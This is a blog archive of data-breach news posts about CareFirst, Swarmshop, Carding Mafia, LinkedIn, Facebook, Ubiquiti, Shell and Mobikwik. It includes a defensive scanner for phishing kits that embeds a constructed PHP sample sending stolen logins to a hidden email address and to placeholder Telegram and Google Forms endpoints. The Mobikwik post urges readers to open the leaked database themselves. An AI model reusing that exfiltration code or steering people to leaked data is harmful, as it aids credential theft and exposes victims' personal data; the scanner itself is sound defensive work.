Showing posts with label Data Breach.

CareFirst Data Breach: Sensitive Information of Customers Leaked Online

For the third time in the past six years, cybercriminals have targeted CareFirst BlueCross BlueShield Community Health Plan District of Columbia (CHPDC). The insurance provider has issued a written statement disclosing a breach of one of its databases, which occurred on January 28.

CHPDC’s managed IT service provider alerted CHPDC to abnormal behavior affecting CHPDC systems. Given its long history with cyber-attacks, the insurer immediately engaged the cybersecurity firm CrowdStrike to identify the source of the leak, and it also notified both the FBI and the Office of the Attorney General for the District of Columbia.

Unfortunately, the hackers were able to gain access to a database and steal sensitive information including names, addresses, contact numbers, dates of birth, and Medicaid identification numbers. After its investigation, CHPDC said the attack was likely carried out by a ‘sophisticated, foreign cybercriminal gang’ and that it was premature to say how many clients had been affected.

“We’ve taken immediate steps to limit the impact of the attack and protect and secure our systems and the information of our enrollees. We’re angry and troubled that anyone would target our enrollees. We’re taking aggressive action on behalf of all those we serve to ensure they are supported and notified as more information becomes available,” George Aloth, CEO of CHPDC, stated.

The company has decided to provide two years of free credit and identity-theft monitoring, along with a website with information on the breach, to all enrollees affected by it.

The 2014 cyber-attack on CHPDC was one of the largest healthcare breaches ever reported, with nearly 1.1 million customers affected. Threat actors targeted a single database that contained information about CareFirst members and others who accessed its websites and services. CareFirst learned of the breach on April 21, 2015, nearly a year later, after it hired Mandiant, a leading cybersecurity company.

In October 2020, the FBI, the Department of Health and Human Services (HHS), and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned that cybercriminals were stepping up ransomware attacks on health-sector organizations at a time when those organizations were involved in Covid-19 treatment and research.

The User Data of Swarmshop Card Shop has been Leaked Online

The database of Swarmshop, a darknet payment-card market, has been stolen for the second time in two years and published on a competing underground website. The dump includes all of Swarmshop's user records and all of the stolen card data traded on the platform.

Group-IB, the global threat-hunting company, found that Swarmshop's user data was leaked online on 17 March 2021. According to Group-IB, the Swarmshop dump contains details of 623,036 bank cards issued by banks in the US, Canada, the United Kingdom, China, Singapore, France, Brazil, Saudi Arabia, and Mexico.

Until recently, Swarmshop appears to have been a typical illegal online marketplace where cybercriminals could buy and sell stolen card and banking data. It remains unclear who extracted the information, or how and when. The leak exposed a large amount of data on four site administrators, 90 sellers, and 12,250 buyers. The researchers wrote, "The dump included criminals' nicknames, hashed passwords and account balance and contact details for some entries.”

The researchers also found “498 sets of online banking account credentials and 69,592 sets of US Social Security Numbers and Canadian Social Insurance Numbers.”

Whoever breached Swarmshop made no announcement and only posted a message with a link to the database. At first, the card shop's administrators claimed that the information came from an earlier breach of the platform in January 2020, although they still asked users to change their passwords. Group-IB reviewed the current dump and concluded it was fresh, based on the most recent timestamps of user activity.

“While underground forums get hacked from time to time, card shop breaches do not happen very often,” Dmitry Volkov, Group-IB’s CTO, said in a statement. “In addition to buyers’ and sellers’ data, such breaches expose massive amounts of compromised payment and personal information of regular users.” 

For decades, hackers have hacked other hackers. It is often easier for them to obtain new hacking tools, dumps, cards, PII, and other valuable goods by hacking the people who stole them in the first place. It is not surprising that Swarmshop has been breached several times. Like everyone else, cybercriminals have security problems; it only shows that cybersecurity is hard regardless of who you are.

In Swarmshop's case, researchers believe the attack is the work of another criminal. About a year ago, the site suffered a similar attack in which a set of data was also compromised. Whoever is responsible, researchers believe the breach will hurt Swarmshop's standing in the cybercrime underground.

Credit Card Hacking Forum Compromised 300,000 User Accounts Due To A Data Breach

According to the breach-notification site ‘Have I Been Pwned’, Carding Mafia, a forum for stealing and trading credit card data, has been compromised, exposing nearly 300,000 user accounts. However, Motherboard reports that there was no sign that its users had been warned on either the Carding Mafia forum or its Telegram channel. According to forum data, Carding Mafia has more than 500,000 users.

The breach potentially exposed 297,744 users' e-mail addresses, IP addresses, usernames, and hashed passwords. The authenticity of the stolen data was verified by Have I Been Pwned founder Troy Hunt, who confirmed that the carding site recognized e-mail addresses from the leak through its 'forgot password' feature while rejecting random e-mail addresses. When an unknown address is submitted, the site shows a notification that reads, “you have not entered an email address that we recognize,” according to Motherboard.

The data reportedly taken from the carding forum was 990 GB in size, comprising 660,000 posts and 130,000 threads, according to screenshots shared by Motherboard. The alleged hacker offered the database for free via private message. Researchers noted some months ago that much of the cybercrime trade was moving to private messaging apps, to avoid alerting law enforcement and the security researchers who typically warn compromised organizations.

It is not unusual for hackers to post stolen data publicly on popular hacking forums to gain "street cred" or a reputation. That credibility can then be used to vouch for other data or even to demand premium prices. Hackers who find it hard to sell stolen data on their own turn to data brokers, who take a generous cut.

Hacker-on-hacker cybercrime is a common way to undermine rival gangs that offer similar services. It can also be a simple way to obtain gigabytes of compromised data free of charge, or to boost the hacker's credibility. IP information could help law enforcement agencies locate cybercriminals, although most criminals use VPN services to hide their real internet addresses. To register on hacking sites, they also use disposable email addresses from providers such as Mailinator. However, inexperienced hackers are likely to make mistakes, such as logging in from their real IP addresses or registering with real email addresses on carding forums.

Meanwhile, Ilia Kolochenko, Founder and Chief Architect at ImmuniWeb, says: “Most of the compromised accounts have fake data and IPs from anonymous VPNs or proxies that are not likely to bring much actionable evidence to law enforcement agencies for investigation. Moreover, even the Western law enforcement agencies are currently underequipped to investigate and prosecute cybercrime on a large scale and will probably not initiate investigatory operations after the leak.”

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for collecting user data stolen on phishing websites. Email remains the most popular way for threat actors to exfiltrate stolen data, but these alternatives foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or company, or even several at once. Phishing kits are often sold to attackers who lack strong coding skills, allowing them to build the infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of the kit helps researchers detect digital footprints that might lead to its developers.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands on cybercriminals' target list, most of them online services (30.7%: document-viewing tools, online shopping, streaming services, and more), email clients (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that phishing kit developers were double-dipping to increase their profits by adding code that sends a copy of the stolen data stream to their own servers. Security researchers explained that one method is to configure the ‘send’ function to deliver the data both to the email address supplied by the kit's buyer and to a ‘token’ variable linked to a concealed email address.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocking phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.
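The exfiltration channels described in this section (buyer email, a concealed second recipient, Telegram bot API calls, Google Forms submissions) are what an analyst looks for when triaging a captured kit. The script below is an added example written for this page, not Group-IB's tooling and not code from any real kit: it scans kit source text for data destinations, decodes base64 literals to surface a hidden recipient, and flags the double-dipping pattern. The kit snippet it scans is constructed for the example; the addresses, bot token and form ID are placeholders.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample: the "send" stage of a hypothetical phishing kit, written
# for this example only. The address, bot token and form ID are placeholders.
# The kit author's hidden second recipient is stored base64-encoded, the
# "token" trick described in the article.
HIDDEN_RECIPIENT_B64 = base64.b64encode(b"kit-author@example.org").decode()
SAMPLE_KIT_SOURCE = f'''<?php
$email = "buyer-placeholder@example.com";            // set by the kit buyer
$token = base64_decode("{HIDDEN_RECIPIENT_B64}");   // concealed by the kit author
$msg = "user=" . $_POST["login"] . " pass=" . $_POST["passwd"];
mail($email, "Result", $msg);
mail($token, "Result", $msg);
file_get_contents("https://api.telegram.org/bot0000000000:PLACEHOLDER_BOT_TOKEN/sendMessage?chat_id=0&text=" . urlencode($msg));
file_get_contents("https://docs.google.com/forms/d/e/PLACEHOLDER_FORM_ID/formResponse?entry.1=" . urlencode($msg));
'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
TELEGRAM_RE = re.compile(r"https?://api\.telegram\.org/bot[^\s\"'/]+/\w+")
GFORMS_RE = re.compile(r"https?://docs\.google\.com/forms/[^\s\"'?]+")
# Candidate base64 literals: long runs of the base64 alphabet plus optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass(frozen=True)
class Finding:
    kind: str          # "email", "telegram_bot" or "google_form"
    value: str         # the destination as written in the kit
    obfuscated: bool   # True if it only appeared after base64 decoding


def decode_base64_literals(source):
    """Return the printable strings hidden in base64 literals of the source."""
    decoded = []
    for match in B64_RE.finditer(source):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan_kit_source(source):
    """Find every exfiltration destination, visible or base64-hidden."""
    findings = set()

    def collect(text, obfuscated):
        for kind, pattern in (("telegram_bot", TELEGRAM_RE),
                              ("google_form", GFORMS_RE),
                              ("email", EMAIL_RE)):
            for match in pattern.finditer(text):
                findings.add(Finding(kind, match.group(0), obfuscated))

    collect(source, obfuscated=False)
    for text in decode_base64_literals(source):
        collect(text, obfuscated=True)
    return sorted(findings, key=lambda f: (f.kind, f.value))


def exfiltration_summary(findings):
    """Group destinations by channel and flag the double-dipping pattern:
    a concealed recipient receiving a copy alongside the visible one."""
    by_kind = {}
    for f in findings:
        by_kind.setdefault(f.kind, []).append(f.value)
    hidden = [f.value for f in findings if f.obfuscated]
    visible = [f.value for f in findings if not f.obfuscated]
    return {
        "destinations": by_kind,
        "hidden_destinations": hidden,
        "double_dipping": bool(hidden) and bool(visible),
    }


if __name__ == "__main__":
    results = scan_kit_source(SAMPLE_KIT_SOURCE)
    for finding in results:
        flag = " (hidden)" if finding.obfuscated else ""
        print(f"{finding.kind:13} {finding.value}{flag}")
    print(exfiltration_summary(results))
```

Run against a real kit, the Telegram and Google Forms matches are the indicators worth blocking or reporting to the service provider, and any recipient that appears only in `hidden_destinations` is the kit author's cut rather than the buyer's. The base64 pass is deliberately simple; real kits may also use `str_rot13`, hex strings or concatenation, which would need further decoders in `decode_base64_literals`.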

Data Stolen from 500 Million LinkedIn Users Leaked Online

Just days after a Facebook data leak was revealed, security experts have discovered another one. This time the victim is LinkedIn: a huge trove of data containing the personal information of 500 million LinkedIn users has been found for sale on a popular hacking forum.

To prove the legitimacy of the leak, the poster included nearly 2 million records as a sample, which forum members can view for $2 worth of forum credits. The leaked data includes user names, contact numbers, email addresses, links to other social media profiles, and users’ workplace details. The data does not contain credit card information, legal documents, or other financial information that could be used for scams.

However, security researchers warned that the absence of financial information does not make the leak harmless. Hackers could use the data to build detailed profiles of potential victims and then conduct targeted phishing or social engineering attacks. They could also spam the email addresses and phone numbers, or brute-force the passwords of LinkedIn profiles and linked email accounts.

The threat actor has demanded a minimum ‘four-digit sum’ in exchange for access to the entire 500 million-user database. Cybernews confirmed that the data in the sample was scraped from LinkedIn, although it remains unclear whether the leaked files contain up-to-date information or were taken from a previous data breach.

5 steps to protect your LinkedIn account

Across the globe, there are nearly 740 million user profiles on LinkedIn. If we presume that the hacker is telling the truth, the data of 500 million of them is now on a hacking forum. LinkedIn users should therefore take all necessary precautions to protect their accounts by:

• Creating a strong and unique password, and storing it in a password manager.

• Enabling two-factor authentication (2FA) on all your online accounts.

• Downloading strong anti-phishing and anti-malware software. 

• Learning to identify phishing emails and text messages.

• Reporting to the cyber police if any problem arises. 

This is not the first time that hackers have targeted LinkedIn users. In 2012, hackers stole the password hashes of nearly 170 million LinkedIn users. The stolen data remained in private hands for almost 4 years before appearing on the dark web in 2016.

Facebook Data Breach: How To Check If Your Details Were Leaked

By now you have probably heard that the social network giant Facebook has suffered a very large-scale user data breach affecting more than 533 million users from over 100 countries.

Cybercriminals posted the data on online servers; it included Facebook IDs, addresses, photos and other details, and in some cases email addresses. Ironically, the personal data of Facebook’s founder and CEO, Mark Zuckerberg, was also among the leaked records.

This article explains how to check whether your personal data was exposed as part of the breach, and how to check for other recent or past leaks.

The first step is to visit Have I Been Pwned, which asks for your email address or the phone number registered on your account. If your email address (and the associated account) has been compromised, it will tell you, and not only for the recent breach: it also lists any other breaches in which your personal data may have been exposed.

"Have I Been Pwned" was created by security researcher Troy Hunt, who was initially skeptical of adding a phone-number search option because of the privacy risks, but ended up adding the feature.

Another tool is a site called The News Each Day, where you can enter your phone number and it will tell you whether your data has been compromised.

Additionally, all users are advised to change their passwords on the compromised sites and to look at the best endpoint protection tools available. Users are also advised to verify the security of the sites and apps they use in order to keep their identity safe, and to rely on the best identity-theft protection.

The data of potential borrowers of Bank Dom.RF are being sold on the Internet

The data was obtained through a leak. A representative of the bank attributed it to a vulnerability in the remote filing of initial applications for cash loans.

Data about people who applied for a loan from Bank Dom.RF were put up for sale on the Internet. The bank confirmed the leak. The Central Bank is conducting a check.

The data of Russians was put up for sale on a specialized website. The announcement was published on April 3. According to the sellers, they have more than 100,000 records of people who have applied for a loan from the bank. The records date from 2020-2021. They may include the requested loan amount, phone numbers, email addresses, full names, dates of birth, passport details, TIN, SNILS, home and work addresses, job title, income, and proxy information. The whole database sells for 100 thousand rubles ($1,308), and individual records for 7-15 rubles ($0.09 - 0.20).

Bank Dom.RF belongs to the financial development institution of the same name in the housing sector, which is fully controlled by the state. It is among the top 20 banks by capital and the top 3 by mortgage portfolio. It was formed in 2017 on the basis of the bank Rossiyskiy Kapital, which is being reorganized.

Dom.RF reported that the leak was due to a vulnerability in the remote filing of initial cash-loan applications. The bank notes that the leaked data does not give access to customer accounts. "As part of operational work, it was eliminated in a short time, at the moment all the bank's systems are functioning normally. For preventive purposes, the security service of Dom.RF checked the integrity of all other systems of the bank and found no violations," reported the bank.

Russian media have already checked the data from the database. Six people responded, and four of them confirmed that they had applied to the bank for a loan or were already its clients.

Furniture Retailer Vhive's Data Breach: Customer Information Leaked Online, Under Investigation

Authorities are investigating a data breach at local furniture retailer Vhive that resulted in customers’ personal information, such as phone numbers and physical addresses, being leaked online. In response to questions from The Straits Times on Saturday, April 3, police confirmed that a report had been filed on the matter.

According to the company, information compromised in the hack includes customers' names, physical and e-mail addresses, and mobile numbers, but it did not include identification numbers or financial information.

In a Facebook post on March 29, Vhive announced that its server was hacked on March 23 and that it was working with police and other relevant agencies, as well as IT forensic investigators, to investigate the breach. 

"All financial records in relation to purchases made with Vhive are held on a separate system which was not hacked," said Vhive. 

"We are truly sorry for the incident and stand ready to assist you if you require immediate help," Vhive told customers. 

According to ST's checks on Saturday afternoon, Vhive's e-mail servers were also compromised. The website displayed only a warning about the cyber attack, while the company's stores on the online shopping platforms Lazada and Shopee remained open for business.

The Altdos hacking group, which operates mainly in Southeast Asia, has claimed responsibility for the breach. In an email to affected customers on Saturday, Altdos said it had hacked into Vhive three times in nine days and claimed to have stolen information of over 300,000 customers as well as nearly 600,000 transaction records. 

The group announced that it will publish 20,000 customer records daily until its demands to Vhive’s management are met. In its Facebook statement, Vhive said it would be closely guided by the forensic investigator and authorities on the steps to protect its systems and ensure that customers can conduct transactions securely. 

In previous incidents, Altdos has stolen customer data from companies, blackmailed the compromised company, leaked the data online when its demands were not met, and publicized the breaches. Its attacks have focused mainly on stock exchanges and financial institutions.

In January, Altdos claimed to have broken into the IT infrastructure of the Bangladeshi conglomerate Beximco Group and stolen data from 34 of its databases.

Last December, it hacked a Thai securities trading firm and posted stolen data online when the firm allegedly failed to acknowledge its emails and claims.

Data Breach at Facebook Leaks Information of 533 Million Users

In a major privacy breach, the data of almost 533 million Facebook users from 106 countries has allegedly been posted online for free. The more than 533 million records posted include over 32 million users in the US, 11 million in the UK, and 6 million in India. This is perhaps the largest breach in the social media giant’s history. Details such as phone numbers, Facebook IDs, full names, locations, birthdates, bios, and in some cases e-mail addresses are included in the leak.

A Facebook spokesman stated that the data had been scraped from the social network through a security vulnerability that was patched in 2019. The vulnerability, identified in 2019, allowed millions of telephone numbers to be pulled from Facebook's servers; the company closed the hole in August 2019.

On Saturday, April 3, Alon Gal, CTO of the cybercrime intelligence company Hudson Rock, detected the leak and confirmed it on Twitter. Gal is the same researcher who in January blew the whistle on a Telegram bot that appeared to be selling data from the same leaked database. Whereas the person behind the bot sold the leaked records to anyone willing to pay, this time the entire dataset is freely available on a low-level hacking forum. Although the database dates from the vulnerability Facebook fixed in 2019, it remains valuable because few people change their telephone numbers often, so the data is still largely accurate. Previously, the person behind the Telegram bot sold a telephone number or Facebook ID for $20,000, or in bulk for $5,000. The data is now widely available to anyone with basic technical know-how.

“A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” added Gal. 

This is not the first time Facebook has been hit by a data leak. Data from 419,000,000 Facebook and 49,000 Instagram users was exposed in online databases in 2019. In the same year, the data of 267 million users was exposed in a further breach. Before that, there was the infamous Cambridge Analytica scandal, which was perhaps the first time Zuckerberg's company came under scrutiny for its data collection practices.

Ubiquiti Shares Fall After Reportedly Downplaying 'Catastrophic' Data Breach

New York City-based IoT device maker Ubiquiti recently disclosed a data breach that it reportedly downplayed. After news of the catastrophic breach broke, the company's shares dropped sharply this week.

In January, Ubiquiti informed customers that unauthorized access to certain IT systems hosted by an unidentified third-party cloud provider had been discovered. The company said at the time that it had found no evidence of user data being compromised but could not rule it out, so it advised customers to change their passwords.

When Ubiquiti disclosed the security breach, it had only a small impact on its stock, and the share price has increased considerably since, from roughly $250 per share on January 12 to $350 per share on March 30. Ubiquiti shares were down to $290 at the time of publishing, following news that the breach may have been bigger than the company led customers and investors to believe.

On Tuesday, March 30, cybersecurity blogger Brian Krebs reported that he had learned from someone involved in the response to the breach that Ubiquiti "massively downplayed" an incident that was actually "catastrophic" in order to reduce the effect on the company's stock market value.

According to Krebs' source, the intruder obtained access to Ubiquiti's AWS servers and then tried to extort 50 bitcoin (worth approximately $3 million) from the company to keep quiet about the hack. As per the source, the intruder obtained privileged credentials from a Ubiquiti employee’s LastPass account and “gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies”. The hacker allegedly had access to Ubiquiti cloud-based devices through remote authentication.

Ubiquiti released a statement on Wednesday in response to Krebs' report, stating that it could not comment further due to an ongoing law enforcement investigation. “In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems,” the company stated. “These experts identified no evidence that customer information was accessed or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.” 

At least two law firms are investigating whether Ubiquiti violated federal securities laws and are urging the company’s investors to contact them.

Ubiquiti has been Covering up a Data Breach

Ubiquiti, a company whose prosumer-grade routers have become synonymous with security and manageability, is being accused of concealing a “catastrophic” security breach, and after 24 hours of silence the company has now issued a statement that does not deny any of the whistle-blower’s claims.

In January, the maker of routers, Internet-connected cameras, and other networked devices disclosed what it called “unauthorized access to certain of our information technology systems hosted by a third-party cloud provider.” The notice said that while there was no evidence the intruders had accessed customer data, the company could not rule out that they had obtained customers' names, email addresses, cryptographically hashed passwords, addresses, and telephone numbers. Ubiquiti advised customers to change their passwords and enable two-factor authentication.

Ubiquiti initially emailed its customers on January 11 about a supposedly minor security breach at a “third-party cloud provider”, but the cybersecurity news site KrebsOnSecurity is now reporting that the breach was far worse than Ubiquiti let on. A whistle-blower from the company who spoke to Krebs claimed that Ubiquiti itself was breached and that the company's legal team blocked efforts to accurately report the risks to customers.

The breach comes as Ubiquiti is pushing, if not outright requiring, cloud-based accounts for customers to set up and manage devices running newer firmware versions. One article notes that during the initial setup of a UniFi Dream Machine (a popular router and home gateway appliance), customers are prompted to sign in to their cloud-based account or, if they do not have one, to create an account.

Brian Krebs of KrebsOnSecurity wrote: "In reality, Adam said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there." (Adam is the fictitious name Krebs gave the whistleblower.)

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Man Indicted In Kansas Water Facility Breach

Today the US Department of Justice charged a Kansas man with breaching a public water system and attempting to shut down its treatment processes with the intention of harming the local community.

The official statement was posted on Wednesday by the Department of Justice (DOJ). The 22-year-old, Wyatt A. Travnichek, a native of Ellsworth County, Kan., is accused of hacking into the computer system of the local water utility. He was well aware of the public harm that could result from illegally gaining access to the Ellsworth County Rural Water District's (also known as Post Rock Rural Water District) computer system, and he tried to sabotage the water system, according to the sources.

The incident took place on 27 March 2019, when Post Rock experienced an unauthorized remote intrusion into its computer system that shut down the facility's operations.

Lance Ehrig, Special Agent in Charge of EPA’s Criminal Investigation Division in Kansas, said that “By illegally tampering with a public drinking water system, the defendant threatened the safety and health of an entire community…”

“…EPA and its law enforcement partners are committed to upholding the laws designed to protect our drinking water systems from harm or threat of harm. Today’s indictment sends a clear message that individuals who intentionally violate these laws will be vigorously prosecuted.” 

Nevertheless, the court documents do not say whether Travnichek’s operation was successful, nor do they explain how it was detected. Officials stated that Travnichek was an employee of the Post Rock Rural Water District from January 2018 until he resigned in January 2019.

Post Rock provides water to around eight Kansas counties. Part of Travnichek's job was to log in to the Post Rock computer system remotely to monitor the plant after hours, but he ended up abusing that access by logging in illicitly.

"He logged in remotely to Post Rock Rural Water District's computer system and performed activities that shut down processes at the facility which affect the facility's cleaning and disinfecting procedures with the intention of harming the Ellsworth County Rural Water District No. 1," the document further reads.

Dutch Privacy Watchdog fines Booking.com €475K

On Wednesday, the Dutch Data Protection Authority announced that it had fined the online travel agency Booking.com €475,000 for failing to report a data security incident within the required timeframe.

The fine was imposed by the Dutch data protection authority because the company is legally headquartered in Amsterdam. It followed an incident in which criminals stole the personal data of over 4,000 Booking.com customers, including the credit card information of over 300 victims, and then attempted to phish the card details of others by posing as Booking.com employees over the phone.

Booking.com was involved in a similar incident in November 2020, when the data of millions of its customers was exposed. The investigation found that the breach was caused by Prestige Software, which stored customers’ payment details without protection. Any customer who had booked with the company since 2013 was affected.

In an official statement, while announcing the fine, VP of Dutch regulator Monique Verdier said: "This is a serious violation. A data breach can, unfortunately, happen anywhere, even if you have taken good precautions. But to prevent damage to your customers and the recurrence of such a data breach, you have to report this in time."

The travel company detected the data breach on January 13, 2019, but did not alert the Data Protection Authority until February 7, although the incident should have been reported within 72 hours. Booking.com notified affected customers on February 4.

Of the delay, Booking.com said: "We, unfortunately, didn't get the matter escalated as fast as we would have liked internally. However, we have since implemented measures to further improve awareness and education amongst our partners and the employees who support them closely, with an aim of further optimizing the speed and efficiency of our internal reporting channels, which is an ongoing and iterative process." 

The company in an emailed statement also stated, “We have since taken additional steps to improve awareness and education amongst our partners and employees on important privacy measures and general security processes, while also working to further optimize the speed and efficiency of our internal reporting channels. The protection and security of personal data is and will remain a top priority at Booking.com.”

Shell’s Employees’ Visas Dumped Online as part of Extortion Attempt

Royal Dutch Shell became the latest corporation to witness an attack by the Clop ransomware group. The compromised servers were rebuilt and brought into service with a new Accellion security patch; the security patch eliminates the vulnerabilities and enhances security controls to detect new attacks and threats. 

"A cyber incident impacted a third-party, Accellion, software tool called the File Transfer Appliance (FTA) which is used within Shell," a Shell spokesperson stated. In a statement last week, Shell confirmed that it too was affected by the security incident, but that the incident only affected the Accellion FTA appliance, which the company uses to transfer large data files securely. 

In an attempt to pressure the company into paying a ransom, the criminals behind the malware siphoned sensitive documents from a software system used by Shell and leaked some of the data online, including a set of employees' passport and visa scans. The implied offer is that once the ransom is paid, no further information will be released into the public domain. 

As stated by Shell, the data accessed during a "limited window of time" contained some personal data together with data from Shell companies and some of their stakeholders. Seeking to downplay the impact, the company stated that "there is no evidence of any impact to Shell's core IT systems," and that the server accessed was "isolated from the rest of Shell's digital infrastructure." But it did acknowledge that the crooks had probably taken "some personal data and data from Shell companies and some of their stakeholders." 

Earlier this month, files from infosec outfit Qualys, including purchase orders, appliance scan results, and quotations, also surfaced on the extortionists' hidden site. Other victims include Canadian aerospace firm Bombardier, which had details of a military-grade radar leaked, London ad agency The7stars, and German giant Software AG.

The group has now posted several documents to its Tor-hidden website, including scans of supposed Shell employees' US visas, a passport page, and files from its American and Hungarian offices, in order to persuade Shell to pay the hackers and prevent more stolen data from leaking. 

According to BleepingComputer, to pile on the pressure, the Clop gang now e-mails its victims to warn them that their data has been stolen and will be leaked if a ransom is not paid.

US-Based Ubiquiti Inc. Covers up a Catastrophic Data Breach, Claims a Whistle-blower

Ubiquiti Inc., a major provider of cloud-enabled Internet of Things (IoT) equipment such as routers, network video recorders, and surveillance cameras, announced on the 11th of January that its customer account information had been compromised in a breach involving a third-party cloud service provider. According to a whistle-blower involved in the response to the breach, Ubiquiti significantly downplayed a "catastrophic" incident in order to protect its stock price, and the third-party cloud provider claim was a fabrication. 

Ubiquiti, whose consumer-grade routers are known for their security and manageability, is accused of concealing a "catastrophic" security breach. The company said that someone gained "unauthorized access" to its servers, which were operated by a "third-party cloud provider" and where data for the ui.com web portal was stored. 

The vendor claimed that the intrusion contained names, email addresses, and likely hashed password credentials, as well as residential addresses and phone numbers of customers. But they did not indicate how many customers were affected. 

Because Ubiquiti reportedly kept root administrator logins in a LastPass account, the hackers had complete access to the company's AWS servers and could have reached any Ubiquiti networking hardware that customers had set up to manage through the company's cloud service. 

When Ubiquiti eventually released a statement, it was far from reassuring; in truth, it was woefully inadequate. The company repeated that there was no proof that any user data had been accessed or stolen. 

However, as Brian Krebs points out, the whistle-blower stated clearly that the organization does not keep logs of who did or did not access the compromised servers, which are the very logs that would serve as such proof. Ubiquiti's statement also says that the hacker tried to extort money from the company. The whistle-blower, who "participated" in the breach investigation, told Krebs a few months later that the event was far worse than it appeared and could be characterized as "catastrophic." The source told KrebsOnSecurity that the third-party cloud provider explanation may have been a "fabrication" and that the breach was "massively downplayed" in an effort to preserve the company's stock value.

In a letter to European regulators, the whistle-blower wrote: "It was catastrophically worse than reported, and legal silenced and overruled efforts to decisively protect customers. The breach was massive, customer data was at risk, access to customers' devices deployed in corporations and homes around the world was at risk." 

According to Krebs, Ubiquiti IT staff discovered a vulnerability planted by threat actors in late December, which was removed in the first week of January. When a second planted vulnerability was found, employee passwords were reportedly rotated before the public was informed of the breach. The cybercriminals approached Ubiquiti and demanded 50 Bitcoin (roughly $3 million) in exchange for silence; the vendor did not respond.

Here's How to Safeguard Against Mobikwik Data Breach

Cybersecurity researchers claimed that the KYC data of as many as 11 crore Mobikwik users had been leaked and put up for sale on the dark web. However, the Gurugram-based digital wallet company denies the data breach, stating that it has not discovered any evidence of a data leak.

Rajshekhar Rajaharia, an independent cyber-security researcher was the first person who disclosed the data leak in February. He had said that bank details, email addresses, and other sensitive details of nearly 11 crore Indians were leaked on the dark web. 

Approximately 8 terabytes (TB) of personal user information was stolen from Mobikwik's main server by a hacker using the name 'Jordan Daven' and put up on dark web platforms on January 20, Rajaharia stated. As evidence, Jordan Daven emailed the link to the stolen database to PTI, stating that they had no motive to use the data other than to get the company to pay for it and then delete it from their end, and also shared the private details of Mobikwik founder Bipin Preet Singh and CEO Upasana Taku from the stolen database. 

When approached, Mobikwik denied the claims and stated: "The company is subjected to stringent compliance measures under its PCI-DSS and ISO certifications, which include annual security audits and quarterly penetration tests to ensure the security of its platform. As soon as this matter was reported, the company undertook a thorough investigation with the help of external security experts and did not find any evidence of a breach." 

Precautionary measures for Mobikwik users 

To check whether your data has been compromised, you need to download the Tor browser, a free and open-source web browser that lets you browse the web anonymously. You should also secure your Mobikwik account by setting a new password and enabling two-factor authentication. 

Open this link to access the entire database of the leak that is now online. Search for your data using your email ID or contact number. If nothing shows up, you are safe; if something does, contact your bank immediately and block your cards.
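Searching a leaked dump directly means typing your own email address or phone number into a site you do not control. A safer way to answer the same question, shown here as an added Python example that is not part of the original post and not the code of any breach-check service, is the hash-prefix (k-anonymity) lookup: the client hashes the identifier locally and sends only the first five hex characters of the hash; the server returns every suffix it holds under that prefix; the comparison happens on the client, so the full identifier never leaves the device. The leaked identifiers, the normalisation rules and the choice of SHA-1 are constructed assumptions for the demonstration.

```python
import hashlib


def normalize(identifier):
    """Canonicalise an identifier before hashing so that differently written
    forms of the same email or phone number produce the same hash.
    Emails are lower-cased; phone numbers are reduced to their digits so
    '+91 98765-43210' and '919876543210' compare equal.
    (Normalisation rules are an assumption of this example.)"""
    s = identifier.strip()
    if "@" in s:
        return s.lower()
    return "".join(ch for ch in s if ch.isdigit())


def sha1_hex(identifier):
    """Upper-case hex SHA-1 of the normalised identifier (40 characters)."""
    return hashlib.sha1(normalize(identifier).encode("utf-8")).hexdigest().upper()


# Constructed sample of identifiers supposedly present in a leak.
# Not real breach data; purely illustrative values.
CONSTRUCTED_LEAKED_IDENTIFIERS = [
    "alice@example.com",
    "bob@example.org",
    "+919876543210",
]


def build_index(identifiers):
    """Server side: map each 5-hex-char hash prefix to the set of 35-char
    suffixes of leaked identifiers sharing that prefix."""
    index = {}
    for ident in identifiers:
        h = sha1_hex(ident)
        index.setdefault(h[:5], set()).add(h[5:])
    return index


def range_query(index, prefix):
    """Server side: the only request the client ever makes. Returns every
    suffix stored under the prefix; the server never learns which one (if
    any) the client cares about."""
    if len(prefix) != 5 or any(c not in "0123456789ABCDEF" for c in prefix):
        raise ValueError("prefix must be 5 upper-case hex characters")
    return sorted(index.get(prefix, ()))


def is_in_leak(index, identifier):
    """Client side: hash locally, send only the prefix, compare the suffix
    locally. True if the identifier appears in the indexed leak."""
    h = sha1_hex(identifier)
    return h[5:] in range_query(index, h[:5])


# Built once from the constructed sample; a real service would hold the
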